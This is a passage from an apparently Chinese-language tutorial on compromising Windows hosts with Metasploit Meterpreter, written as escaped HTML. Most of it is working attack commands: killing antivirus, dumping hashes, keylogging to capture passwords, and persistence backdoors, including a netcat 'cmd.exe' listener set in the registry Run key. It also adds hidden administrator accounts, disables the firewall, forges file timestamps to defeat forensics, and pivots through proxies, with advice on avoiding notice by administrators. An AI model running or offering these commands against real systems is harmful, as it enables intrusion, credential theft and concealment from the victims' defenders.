    \u4f46\u662f\u8fd9\u4e2a\u811a\u672c,\u4e0d\u80fd\u7edd\u5bf9\u5f97\u9003\u907f\u6740\u6bd2\u8f6f\u4ef6\uff0c\u4f46\u662f\u5982\u679c\u6210\u529f\u4e86\u5bf9\u88ab\u653b\u51fb\u8005\u4f1a\u662f\u4e00\u4e2a\u4e25\u91cd\u7684\u6253\u51fb\uff0c\u5bf9\u4ed6\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u4f7f\u7528\u4e86 \u201crun killav\u201d\u547d\u4ee4\u540exp\u4f1a\u7ec8\u6b62Av\u8fdb\u7a0b\u7136\u540e\u5f39\u51fa\u7a97\u53e3\uff1a<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (7)hashdump\u2014\u2014\u201crun hashdump\u201d\u83b7\u5f97\u5bc6\u7801\u54c8\u5e0c\u503c<\/p>\n\n\n\n

    \u8fd0\u884c\u8fd9\u4e2a\u811a\u672c\u548c\u5728meterpreter\u4e0b\u76f4\u63a5\u8fd0\u884chashdump\u7ed3\u679c\u5dee\u4e0d\u591a\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (8)keylogrecorder\u2014\u2014\u201crun keylogrecorder\u201d\u547d\u4ee4\u4e3a\u8bb0\u5f55\u952e\u76d8\u4fe1\u606f<\/p>\n\n\n\n

    \u8fd0\u884c\u8fd9\u4e2a\u811a\u672c\u548c\u5728meterpreter\u4e0b\u76f4\u63a5\u8fd0\u884ckeyscan\u7ed3\u679c\u5dee\u4e0d\u591a\uff0c\u8fd9\u91cc\u5c06\u5bf9\u952e\u76d8\u8bb0\u5f55\u7684\u6587\u4ef6\u8fdb\u884c\u4fdd\u5b58\uff0c\u8def\u5f84\u5982\u4e0b\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    (9) persistence\u2014\u2014\u201crun persistence\u201d\u8fd9\u4e2a\u811a\u672c\u53ef\u4ee5\u88ab\u7528\u4f5c\u6301\u7eed\u6b3a\u9a97\u4e3b\u673a   <\/p>\n\n\n\n

    \u8fdc\u7a0b\u4e3b\u673a\u91cd\u542f\u540e\u5c06\u5728\u7279\u5b9a\u7684\u65f6\u95f4\u95f4\u9694\u4fdd\u6301meterpreter\u4f1a\u8bdd<\/p>\n\n\n\n

    run  persistence -X -i  5  -p 4444 -r 172.17.11.18   #\u690d\u5165\u540e\u95e8<\/p>\n\n\n\n

    -X \u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u5f00\u673a\u81ea\u542f\u52a8<\/p>\n\n\n\n

    -i  \u4e0d\u65ad\u5c1d\u8bd5\u53cd\u5411\u8fde\u63a5\u7684\u65f6\u95f4\u95f4\u9694<\/p>\n\n\n\n

    persistence\u540e\u6e17\u900f\u6a21\u5757\u5411\u76ee\u6807\u4e3b\u673a\u690d\u5165\u540e\u95e8\u7a0b\u5e8f<\/p>\n\n\n\n

    \u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

    \"\"
    \u6267\u884c\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n

    \u521b\u5efa\u653b\u51fb\u8f7d\u8377->\u653b\u51fb\u8f7d\u8377\u690d\u5165\u5230\u76ee\u6807\u4e3b\u673ac:\\windows\\temp\u76ee\u5f55\u4e0b\uff0c\u662f\u4e00\u4e2a.vbs\u7684\u811a\u672c->\u5199\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868\u952e\u503c\u5b9e\u73b0\u5f00\u673a\u81ea\u52a8\u8fd0\u884c\u3002
    \u4e0b\u56fe\uff0c\u5728\u653b\u51fb\u4e3b\u673a\u4e0a\u76d1\u542c4444\u7aef\u53e3\uff0c\u7b49\u5f85\u53cd\u5f39\u4f1a\u8bdd\u6210\u529f<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    \u4e0b\u56fe\uff0c\u770b\u76ee\u6807\u4e3b\u673a\u6ce8\u518c\u8868Run\u952e\u503c\u679c\u7136\u88ab\u5199\u5165\u4e86\u4e00\u4e2apDTizIlNK\u7684\u952e\u503c\uff0c\u6267\u884c\u540e\u95e8vbs\u811a\u672c
    \"\"<\/p>\n\n\n\n

    (10)enum_drives<\/p>\n\n\n\n

    \u8fd9\u4e2a\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u662f\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\u5206\u533a\u4fe1\u606f\uff0c\u6211\u4eec\u5c31\u4ee5\u8fd9\u4e2a\u4f8b\u8bb2\u89e3\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u4f7f\u7528\u65b9\u6cd5\u3002<\/p>\n\n\n\n

    \u540e\u6e17\u900f\u6a21\u5757post\/windows\/gather\/forensics\/enum_drives\u8c03\u7528<\/p>\n\n\n\n

    \u5728\u83b7\u53d6meterpreter\u4f1a\u8bddsession\u540e\uff0c\u8c03\u7528post\/windows\/gather\/forensics\/enum_drives\uff0c\u53ef\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u5b58\u50a8\u5668\u4fe1\u606f\uff1a<\/p>\n\n\n\n

    \u547d\u4ee4\uff0c\u5728msfconsole\u4e0b\uff1a<\/p>\n\n\n\n

    use post\/windows\/gather\/forensics\/enum_drives<\/p>\n\n\n\n

    set SESSION 1<\/p>\n\n\n\n

    exploit<\/p>\n\n\n\n

    \u6548\u679c\u5982\u56fe\uff1a<\/p>\n\n\n\n

    \"\"\"\"
    \u6216\u76f4\u63a5\u5728meterpreter\u4f1a\u8bdd\u4e2d\u4ee5\u547d\u4ee4run post\/windows\/gather\/forensics\/enum_drives\u8c03\u7528<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    \u6211\u4eec\u9996\u5148\u5c06meterpreter\u4f1a\u8bdd\u653e\u5165\u540e\u53f0\uff0c\u7136\u540e\u641c\u7d22\u6211\u4eec\u7684\u6a21\u5757\u3002<\/p>\n\n\n\n

    \"\"\/<\/figure>\n\n\n\n

    \u7136\u540e\u4f7f\u7528use\u547d\u4ee4\u6765\u4f7f\u7528\u6a21\u5757\uff0c\u7136\u540e\u8bbe\u7f6e\u4e00\u4e0b\u4f1a\u8bddid\uff0c\u63a5\u7740\u6267\u884c\uff0c\u53ef\u4ee5\u53d1\u73b0\u6210\u529f\u83b7\u53d6\u5230\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\u5206\u533a\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n

    18.SOCKS\u4ee3\u7406<\/p>\n\n\n\n

    Metasploit\u53ef\u4ee5\u4f5c\u4e3a\u4e00\u4e2aSOCKS\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5177\u4f53\u6b65\u9aa4\u4e3a\u9996\u5148\u901a\u8fc7Metasploit\u7684\u67d0\u4e9b\u6a21\u5757\u5efa\u7acb\u4f1a\u8bdd\uff0c\u5c31\u50cf\u672c\u7ae0\u524d\u9762\u4ecb\u7ecd\u7684\uff0c\u5efa\u7acb\u5b8c\u4f1a\u8bdd\u4e4b\u540e\uff0c\u6267\u884c\u201croute add +IP+mask+SID\u201d\uff0c\u672c\u4f8b\u4e2d\u6211\u4eec\u8def\u7531\u7684ip\u7f51\u6bb5\u4e3a10.1.1.0\uff0c\u7136\u540e\u4f7f\u7528\u201cuse auxiliary\/server\/socks4a\u201d\u547d\u4ee4\u6765\u4f7f\u7528sock4a\u6a21\u5757\uff0c\u6267\u884crun\u547d\u4ee4 \uff0csocks\u4fbf\u4f1a\u6267\u884c<\/p>\n\n\n\n

    \u7136\u540e\u518d\u5728\u547d\u4ee4\u884c\u4e0b\u6267\u884cproxychains\u547d\u4ee4\uff0c\u4f7f\u7528\u4ee3\u7406\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u626b\u63cf\uff0cnmap\uff0cnc\u7b49\u90fd\u53ef\u4ee5\uff0c\u6b64\u4f8b\u5b50\u4e2d\u6211\u4eec\u5bf9\u76ee\u6807\u673a10.1.1.130\u7684445\u7aef\u53e3\u8fdb\u884c\u626b\u63cf\u3002\u4ece\u8fd4\u56de\u7ed9\u6211\u4eec\u7684\u7ed3\u679c\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u7684\u4ee3\u7406\u5df2\u7ecf\u8bbe\u7f6e\u6210\u529f\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n
    \"\"\/<\/a><\/figure>\n\n\n\n

    19.\u8fd0\u884c\u7a0b\u5e8f<\/p>\n\n\n\n

    \u6211\u4eec\u8fd8\u53ef\u4ee5\u4f7f\u7528\u201cexecute\u201d\u547d\u4ee4\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u6267\u884c\u5e94\u7528\u7a0b\u5e8f\u3002\u8fd9\u4e2a\u547d\u4ee4\u7684\u4f7f\u7528\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n

    execute -f<file> [Options]<\/p>\n\n\n\n

    execute -f cmd.exe -i#\u6267\u884ccmd.exe\u547d\u4ee4\u5e76\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n

    execute -f cmd.exe -i -t#\u4ee5\u6240\u6709\u53ef\u7528\u4ee4\u724c\u6765\u6267\u884ccmd\u547d\u4ee4<\/p>\n\n\n\n

    execute -f cmd.exe -i -H -t#\u521b\u5efa\u65b0\u8fdb\u7a0bcmd.exe\uff0c-H\u4e0d\u53ef\u89c1\uff0c-i\u4ea4\u4e92<\/p>\n\n\n\n

    execute -H -i -f cmd.exe<\/p>\n\n\n\n

    execute  -H -m -d notepad.exe-f  wce.exe -a “-o wce.txt”<\/p>\n\n\n\n

    \u8fd0\u884c\u540e\u5b83\u5c06\u6267\u884cfile\u53c2\u6570\u6240\u6307\u5b9a\u7684\u6587\u4ef6\u3002\u53ef\u9009\u53c2\u6570\u5982\u4e0b\uff1a<\/p>\n\n\n\n

    -H\uff1a\u521b\u5efa\u4e00\u4e2a\u9690\u85cf\u8fdb\u7a0b<\/p>\n\n\n\n

    -a\uff1a\u4f20\u9012\u7ed9\u547d\u4ee4\u7684\u53c2\u6570<\/p>\n\n\n\n

    -i\uff1a\u8ddf\u8fdb\u7a0b\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n

    -m\uff1a\u4ece\u5185\u5b58\u4e2d\u6267\u884c<\/p>\n\n\n\n

    -t\uff1a\u4f7f\u7528\u5f53\u524d\u4f2a\u9020\u7684\u7ebf\u7a0b\u4ee4\u724c\u8fd0\u884c\u8fdb\u7a0b<\/p>\n\n\n\n

    -s\uff1a\u5728\u7ed9\u5b9a\u4f1a\u8bdd\u4e2d\u6267\u884c\u8fdb\u7a0b<\/p>\n\n\n\n

    -f \u6267\u884c\u7684\u7a0b\u5e8f\u6587\u4ef6<\/p>\n\n\n\n

    -d \u5728\u76ee\u6807\u4e3b\u673a\u6267\u884c\u65f6\u663e\u793a\u7684\u8fdb\u7a0b\u540d\u79f0\uff08\u7528\u4ee5\u4f2a\u88c5\uff09<\/p>\n\n\n\n

    -o wce.txt”\u662fwce.exe\u7684\u8fd0\u884c\u53c2\u6570<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    20.\u521b\u5efa\u8d26\u53f7<\/p>\n\n\n\n

    getgui\u2014\u2014getgui \uff0c\u4e3a\u6dfb\u52a0\u7528\u6237\u7684\u547d\u4ee4\uff0c\u9996\u5148\u7528\u201crun getgui -h\u201d\u67e5\u770b\u811a\u672cgetgui\u7684\u5e2e\u52a9\u4fe1\u606f<\/p>\n\n\n\n

    run  getgui-e #\u5f00\u542f\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n

    run  getgui -uexample_username -pexample_password #\u6dfb\u52a0\u8d26\u53f7<\/p>\n\n\n\n

    \u8c03\u7528getgui\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n

    \u4f5c\u7528\uff1a\u5f00\u542f\u76ee\u6807\u4e3b\u673a\u8fdc\u7a0b\u684c\u9762\uff0c\u5e76\u53ef\u6dfb\u52a0\u7ba1\u7406\u5458\u7ec4\u8d26\u53f7<\/p>\n\n\n\n

    \u547d\u4ee4\uff1a<\/p>\n\n\n\n

    run  getgui  -e<\/p>\n\n\n\n

    \u5f00\u542f\u76ee\u6807\u4e3b\u673a\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n

    \u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

    \"\"
    \u5f00\u542f\u76ee\u6807\u4e3b\u673a\u7684\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\u540e\uff0c\u53ef\u4ee5\u6dfb\u52a0\u8d26\u53f7\u4ee5\u4fbf\u5229\u7528<\/p>\n\n\n\n

    \u547d\u4ee4\uff1a<\/p>\n\n\n\n

    run  getgui -u  example_username -p  example_password<\/p>\n\n\n\n

    \u5982\u4e0b\u56fe\uff1a
    \"\"
    \u6267\u884c\u6210\u529f\uff0c\u53ef\u4ee5\u4f7f\u7528kali\u7684rdesktop\u547d\u4ee4\u4f7f\u7528\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5\u76ee\u6807\u4e3b\u673a<\/p>\n\n\n\n

    rdesktop  -u kali  -p meterpreter  192.168.250.176:3389<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u4ece\u4e0a\u56fe\u53ef\u4ee5\u770b\u51fa\u8fd9\u4e2a\u811a\u672c\u7684\u7528\u6cd5\u662f\u201crungetgui \u2013u username \u2013p password\u201d\uff0c\u6211\u6dfb\u52a0\u4e86\u4e00\u4e2alu\u7684\u7528\u6237\u5bc6\u7801\u4e3a6666\u3002\u4ece\u4e0b\u56fe\u4e2d\u53ef\u4ee5\u770b\u5230\u7528\u6237\u5df2\u7ecf\u6dfb\u52a0\u6210\u529f\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u6dfb\u52a0\u5b8c\u8d26\u6237\u4e4b\u540e\u4f7f\u7528rdesktop\u547d\u4ee4\u8fde\u63a5\u4e00\u4e0b\u8fdc\u7a0b\u4e3b\u673a\uff0c\u5177\u4f53\u7528\u6cd5\u662f\u201crdesktop \u2013u username \u2013p password IP\u201d\u6267\u884c\u547d\u4ee4\u4e4b\u540e\u5c31\u4f1a\u5f39\u51fa\u4e00\u4e2a\u7a97\u53e3\uff0c\u53ea\u9700\u518d\u8f93\u5165\u4e00\u6b21\u5bc6\u7801\u5c31\u53ef\u4ee5\u8fdb\u5165\u76ee\u6807\u673a\u5668\uff0c\u5e76\u5bf9\u76ee\u6807\u673a\u5668\u76f4\u63a5\u8fdb\u884c\u63a7\u5236\u3002<\/p>\n\n\n\n

    \"\"\/<\/a><\/figure>\n\n\n\n

    \u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u53ef\u4ee5\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u7528\u6237\u8d26\u53f7\uff08getgui\u811a\u672c\uff0c\u4f7f\u7528-u\u548c-p\u53c2\u6570\uff09\uff0c\u5e76\u7ed9\u5b83\u5206\u914d\u7ba1\u7406\u5458\u6743\u9650\uff08\u4f7f\u7528\uff09\uff0c\u7136\u540e\u5c06\u5176\u6dfb\u52a0\u5230\u201d\u8fdc\u7a0b\u684c\u9762\u7528\u6237\u201d\u7ec4\u4e2d\u3002<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n
    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u5f53\u7136\u4e86\uff0c\u4f60\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u5c06\u8fd9\u4e2a\u65b0\u6dfb\u52a0\u7684\u7528\u6237Hacker\u5728Windows\u767b\u5f55\u754c\u9762\u4e2d\u9690\u85cf\u3002<\/p>\n\n\n\n

    21.\u542f\u7528\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n

    \u5f53\u6211\u4eec\u65b0\u6dfb\u52a0\u7684\u7528\u6237\u5df2\u7ecf\u62e5\u6709\u8fdc\u7a0b\u684c\u9762\u6743\u9650<\/a>\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u8d26\u53f7\u51ed\u8bc1\u6765\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e86\u3002<\/p>\n\n\n\n

    \u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u786e\u4fdd\u76ee\u6807Windows\u8bbe\u5907\u5f00\u542f\u4e86\u8fdc\u7a0b\u684c\u9762\u529f\u80fd\uff08\u9700\u8981\u5f00\u542f\u591a\u4e2a\u670d\u52a1\uff09\uff0c\u4e0d\u8fc7\u6211\u4eec\u7684getgui\u811a\u672c\u53ef\u4ee5\u5e2e\u6211\u4eec\u641e\u5b9a\u3002\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528-e\u53c2\u6570\u786e\u4fdd\u76ee\u6807\u8bbe\u5907\u5f00\u542f\u4e86\u8fdc\u7a0b\u684c\u9762\u529f\u80fd\uff08\u91cd\u542f\u4e4b\u540e\u540c\u6837\u4f1a\u81ea\u52a8\u5f00\u542f\uff09\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u5728\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e4b\u524d\uff0c\u6211\u4eec\u8fd8\u9700\u8981\u4f7f\u7528\u201cidletime\u201d\u547d\u4ee4\u68c0\u67e5\u8fdc\u7a0b\u7528\u6237\u7684\u7a7a\u95f2\u65f6\u957f\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u8fd9\u6837\u53ef\u4ee5\u964d\u4f4e\u4f60\u88ab\u53d1\u73b0\u7684\u6982\u7387\uff0c\u56e0\u4e3a\u5f53\u76ee\u6807\u7528\u6237\u767b\u5f55\u4e4b\u540e\uff0c\u5b83\u5c06\u4f1a\u770b\u5230\u5982\u4e0b\u56fe\u6240\u793a\u7684\u4fe1\u606f\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u4e0b\u56fe\u663e\u793a\u7684\u662f\u653b\u51fb\u8005\u4f7f\u7528\u65b0\u521b\u5efa\u7684\u201cHacker\u201d\u8d26\u53f7\u8fde\u63a5\u5230\u8fdc\u7a0b\u684c\u9762\u7684\u753b\u9762\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    run post\/windows\/manage\/enable_rdp<\/p>\n\n\n\n

    \"20161006114052\"\/<\/figure>\n\n\n\n

    \u8fd8\u53ef\u4ee5\u4f7f\u7528 run getgui -e \u6765\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n\n\n\n

    \"20161006121512\"\/<\/figure>\n\n\n\n

    \u5229\u7528\u8be5\u547d\u4ee4\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6dfb\u52a0\u7528\u6237\uff1a<\/p>\n\n\n\n

    run getgui -u xxxxx -p xxxxx<\/p>\n\n\n\n

    22.\u7ed1\u5b9a\u8fdb\u7a0b<\/p>\n\n\n\n

    Meterpreter\u65e2\u53ef\u4ee5\u5355\u72ec\u8fd0\u884c\uff0c\u4e5f\u53ef\u4ee5\u4e0e\u5176\u4ed6\u8fdb\u7a0b\u8fdb\u884c\u7ed1\u5b9a\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u8ba9Meterpreter\u4e0e\u7c7b\u4f3cexplorer.exe\u8fd9\u6837\u7684\u8fdb\u7a0b\u8fdb\u884c\u7ed1\u5b9a\uff0c\u5e76\u4ee5\u6b64\u6765\u5b9e\u73b0\u6301\u4e45\u5316\u3002<\/p>\n\n\n\n

    \u5728\u4e0b\u9762\u7684\u4f8b\u5b50\u4e2d\uff0c\u6211\u4eec\u4f1a\u5c06Meterpreter\u8ddfwinlogon.exe\u7ed1\u5b9a\uff0c\u5e76\u5728\u767b\u5f55\u8fdb\u7a0b\u4e2d\u6355\u83b7\u952e\u76d8\u8bb0\u5f55\u3002<\/p>\n\n\n\n

    \u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u4f7f\u7528\u201cps\u201d\u547d\u4ee4\u67e5\u770b\u76ee\u6807\u8bbe\u5907\u4e2d\u8fd0\u884c\u7684\u8fdb\u7a0b\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u63a5\u4e0b\u6765\uff0c\u4f7f\u7528\u201cgetpid\u201d\u627e\u51fa\u9700\u8981\u7ed1\u5b9a\u7684\u8fdb\u7a0b\uff0c\u63a5\u4e0b\u6765\uff0c\u4f7f\u7528migrate\u547d\u4ee4+pid\u6765\u7ed1\u5b9a\u8fdb\u7a0b\u3002<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u7ed1\u5b9a\u5b8c\u6210\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5f00\u59cb\u6355\u83b7\u952e\u76d8\u6570\u636e\u4e86\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u53ef\u4ee5\u9009\u62e9\u5bfc\u51fa\u952e\u76d8\u8bb0\u5f55\uff0c\u6216\u8005\u4f7f\u7528\u547d\u4ee4\u201cenum_logged_on_users\u201d\u6765\u68c0\u67e5\u7528\u6237\u662f\u5426\u6210\u529f\u767b\u5f55\uff1a<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u7b49\u5f85\u7247\u523b\u4e4b\u540e\uff0c\u4f7f\u7528keyscan_dump\u547d\u4ee4\u5bfc\u51fa\u8bb0\u5f55\u4fe1\u606f:<\/p>\n\n\n\n

    \"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

    \u6355\u6349\u5230\u7684\u7528\u6237\u5bc6\u7801\u4e3atrustno1<\/p>\n\n\n\n

    23.\u901a\u8fc7\u5176 shell \u6765\u5173\u95ed\u9632\u706b\u5899<\/p>\n\n\n\n

    netsh adcfirewall set allprofiles state off<\/p>\n\n\n\n

    \"20161006112128\"\/<\/figure>\n\n\n\n

    \u6211\u4eec\u6253\u5f00\u9632\u706b\u5899\u914d\u7f6e\u67e5\u770b\u9632\u706b\u5899\u5df2\u6210\u529f\u88ab\u6211\u4eec\u5173\u95ed!<\/p>\n\n\n\n

    \"20161006113355\"\/<\/figure>\n\n\n\n

    \u4f46\u662f\u6211\u4eec\u53ef\u4ee5\u770b\u51fa\uff0c\u5982\u679c\u76ee\u6807\u7ba1\u7406\u5458\u67e5\u770b\u9632\u706b\u5899\u914d\u7f6e\uff0c\u53d1\u73b0\u9632\u706b\u5899\u88ab\u4eba\u4e3a\u5173\u95ed\uff0c\u90a3\u4e48\u5fc5\u5b9a\u5f15\u8d77\u7ba1\u7406\u5458\u7684\u8b66\u60d5\uff01\u56e0\u6b64\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u901a\u8fc7\u7b56\u7565\u7684\u6dfb\u52a0\uff0c\u6765\u9690\u853d\u6211\u4eec\u7684\u884c\u4e3a\u3002<\/p>\n\n\n\n

    netsh firewall add portopening TCP 444 \u201cVMWARE\u201d ENABLE ALL<\/p>\n\n\n\n

    \u4f2a\u88c5\u6210\u4e00\u4e2a\u7cfb\u7edf\u6b63\u5e38\u7684\u8fdb\u7a0b\uff0c\u4e4b\u540e\u8fdc\u7a0b\u91cd\u542f\u76ee\u6807\u7cfb\u7edf\uff0c\u5e76\u5229\u7528 NC \u8fde\u63a5\u5373\u53ef\uff01<\/p>\n\n\n\n

    24.\u5229\u7528\u6ce8\u518c\u8868\u6dfb\u52a0 NC \u540e\u95e8<\/p>\n\n\n\n

    1.\u4e0a\u4f20 NC \u5230\u76ee\u6807\u7cfb\u7edf\uff1a<\/p>\n\n\n\n

    upload \/usr\/share\/windows-binaries\/nc.exe C:\\\\windows\\\\system32<\/p>\n\n\n\n

    2.\u679a\u4e3e\u6ce8\u518c\u8868\u5185\u5bb9\uff08\u5f00\u673a\u542f\u52a8\uff09<\/p>\n\n\n\n

    reg enumkey -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run<\/p>\n\n\n\n

    3.\u5728\u8be5\u6ce8\u518c\u8868\u589e\u52a0\u5185\u5bb9\uff08\u5f00\u673a\u542f\u52a8\uff09<\/p>\n\n\n\n

    reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v nc -d \u201cC:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe\u201d<\/p>\n\n\n\n

    4.\u67e5\u770b\u5185\u5bb9\u662f\u5426\u589e\u52a0\u6210\u529f\uff1a<\/p>\n\n\n\n

    reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v nc<\/p>\n\n\n\n

    \"20161006141320\"\/<\/figure>\n\n\n\n

    25.\u57fa\u4e8eMACE\u65f6\u95f4\u7684\u53cd\u7535\u5b50\u53d6\u8bc1<\/p>\n\n\n\n

    timestomp -v secist.txt  #\u67e5\u770b\u5f53\u524d\u76ee\u6807\u6587\u4ef6 MACE \u65f6\u95f4\u3002<\/p>\n\n\n\n

    timestomp c:\/a.doc -c \u201c10\/27\/2015 14:22:11\u201d #\u4fee\u6539\u6587\u4ef6\u7684\u521b\u5efa\u65f6\u95f4\uff0c\u4f8b\u5982\u4fee\u6539\u6587\u4ef6\u7684\u521b\u5efa\u65f6\u95f4\uff08\u53cd\u53d6\u8bc1\u8c03\u67e5\uff09<\/p>\n\n\n\n

    \"20161006172320\"\/<\/figure>\n\n\n\n

    timestomp -f c:\\\\AVScanner.ini secist.txt \uff08\u5c06\u6a21\u677f\u6587\u4ef6MACE\u65f6\u95f4\uff0c\u590d\u5236\u7ed9\u5f53\u524d\u6587\u4ef6\uff09<\/p>\n\n\n\n

    timestomp -v secist.txt<\/p>\n\n\n\n

    26.\u5185\u7f51\u4ee3\u7406<\/p>\n\n\n\n

    meterpreter > run autoroute -s 192.168.1.0\/24<\/p>\n\n\n\n

    msf exploit(handler) > use auxiliary\/scanner\/portscan\/tcp<\/p>\n\n\n\n

    msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306<\/p>\n\n\n\n

    msf auxiliary(tcp) > set RHOSTS 192.168.3.1\/24<\/p>\n\n\n\n

    msf auxiliary(tcp) > set THERADS 10<\/p>\n\n\n\n

    msf auxiliary(tcp) > exploit<\/p>\n\n\n\n

    meterpreter > background<\/p>\n\n\n\n

    msf exploit(handler) > use auxiliary\/server\/socks4a<\/p>\n\n\n\n

    msf auxiliary(socks4a) > route print<\/p>\n\n\n\n

    msf auxiliary(socks4a) > ifconfig<\/p>\n\n\n\n

    msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx #xxx.xxx.xx.xx\u4e3a\u81ea\u5df1\u8fd0\u884cmsf\u7684vps\u673a\u5b50’<\/p>\n\n\n\n

    msf auxiliary(socks4a) > exploit<\/p>\n\n\n\n

    27.SSH\u4ee3\u7406<\/p>\n\n\n\n

    msf > load meta_ssh<\/p>\n\n\n\n

    msf > use multi\/ssh\/login_password<\/p>\n\n\n\n

    msf > set RHOST 192.168.56.3<\/p>\n\n\n\n

    RHOST => 192.168.56.3<\/p>\n\n\n\n

    msf > set USER test<\/p>\n\n\n\n

    USER => test<\/p>\n\n\n\n

    msf > set PASS reverse<\/p>\n\n\n\n

    PASS => reverse<\/p>\n\n\n\n

    msf > set PAYLOAD ssh\/metassh_session<\/p>\n\n\n\n

    PAYLOAD => ssh\/metassh_session<\/p>\n\n\n\n

    msf > exploit -z<\/p>\n\n\n\n

    [*] Connecting to dsl@192.168.56.3:22 with password reverse<\/p>\n\n\n\n

